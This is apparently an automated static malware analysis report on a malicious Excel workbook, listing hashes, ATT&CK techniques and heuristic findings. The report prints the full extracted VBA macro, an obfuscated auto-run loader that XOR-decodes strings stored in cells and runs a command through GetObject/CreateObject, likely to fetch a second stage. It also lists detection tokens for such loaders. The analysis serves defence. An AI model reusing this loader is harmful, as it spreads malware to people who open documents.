Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 ba86a09b8aabe54d…

MALICIOUS

Office (OLE) / .XLS

Size: 49.0 KB
Created: 2023-04-16 23:00:14
Authoring application: Microsoft Excel
First seen: 2023-04-19
MD5: 0eca0fa95c98cc64f9abd01e89909ddd
SHA-1: ea9707fb215ff5d7a31d6c5d32eedef86124758d
SHA-256: ba86a09b8aabe54dc7dee3247935d051cd4db9422bb9840157d86cde87291b83
Risk Score: 148

Malware Insights

MITRE ATT&CK
T1059.005: Visual Basic
T1203: Exploitation for Client Execution

The sample is a malicious Excel file containing VBA macros. The Workbook_Open macro triggers execution of the GatherinG subroutine, which uses GetObject and CreateObject to instantiate an object. This object is then used to run a command, likely downloading and executing a second-stage payload. The specific command and payload are obfuscated, but the intent is clear.

Heuristics 5

  • VBA macros detected (severity: medium; 4 related findings; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; ID: OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set Strictly = GetObject(Melissa).CreateObject(Similarly)
  • GetObject call (severity: high; ID: OLE_VBA_GETOBJ)
    Matched line in script:
    Set Strictly = GetObject(Melissa).CreateObject(Similarly)
  • VBA p-code auto-exec with execution tokens (severity: high; ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; ID: OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4811 bytes
SHA-256: 87e4996b9f7c2379158ac7277c08c8e1f2e01c6119c3b69c88a122f320011698
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private CiviC As String






                                                        Private PhotograPh As String
Private Fisher As String





            Private Mills As String






              Private Strictly As Object









             Private Sub GatherinG()







             Dim Melissa As String, Profits As String, AnAlyses As String, Similarly As String







                                        







               GoTo Profits
Meters:
Melissa = RestoRe(CiviC): Profits = RestoRe(PhotograPh): AnAlyses = RestoRe(Fisher): Similarly = RestoRe(Mills)
Set Strictly = GetObject(Melissa).CreateObject(Similarly)
GoTo Overnight
Profits:
CiviC = Sheets("tcb5").Range("E167").Value: PhotograPh = Sheets("tcb5").Range("J100").Value: Fisher = Sheets("tcb5").Range("J103").Value: Mills = Sheets("tcb5").Range("F183").Value






                                                                GoTo Meters
Overnight:
Strictly.Run AnAlyses & " " & Profits, 0
End Sub
Sub Workbook_Open()
GoTo Florist








                   Dim Gates As String
Gates = InputBox("enter the first number")








                  Dim SectorS As String
SectorS = InputBox("enter the last number")
MsgBox Gates







                                                                    MsgBox SectorS
Florist:





                 If Gates = "" Then
GatherinG





                                                            End If





                                                                    End Sub
Private Function Parenting(ByVal Threshold As String) As Variant






                 







                                            Dim Walter() As Byte, i As Long, TesTimony As Integer






          i = 0: ReDim Walter(0 To (Len(Threshold) / 2)) As Byte
Gates:






                                                                            If i < Len(Threshold) Then
TesTimony = TesTimony + 1








                                                                    Walter(TesTimony - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Threshold, i + 1, 2)
i = i + 2
GoTo Gates





                                                                Else
GoTo SectorS






                                                            







                                                                            End If
SectorS:





              Parenting = Walter








                                                        End Function





           Private Function RestoRe(ByVal AdvAntAges As String) As Variant





                                                            Dim Districts As Long: Districts = 0: Dim Justin() As Byte: Dim Packs() As Byte, Walter As String, TesTimony As Integer
Packs = "y771c6447f"
GoTo Twelve
Danger:








                                                                        Dim SectorS As String







               SectorS = InputBox("put calc number")
MsgBox SectorS





SuperviSor:
If Districts < UBound(Justin) Then
TesTimony = Districts Mod (10)





           





                                                                        







                   GoTo Melissa
Profits:
Walter = Walter & Chr(Justin(Districts))
Districts = Districts + 1
GoTo SuperviSor





                                                                





                                                        Else
GoTo Xhtml
End If
Threshold:






             MsgBox "err -52525"
Dim Gates As String
Gates = InputBox("")





                   MsgBox Gates
Xhtml:






              RestoRe = Walter
Exit Function






Twelve:
Justin = Parenting(AdvAntAges)








                                                GoTo SuperviSor
Melissa:
Justin(Districts) = Abs(Justin(Districts) Xor Packs(TesTimony * 2))








           GoTo Profits
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True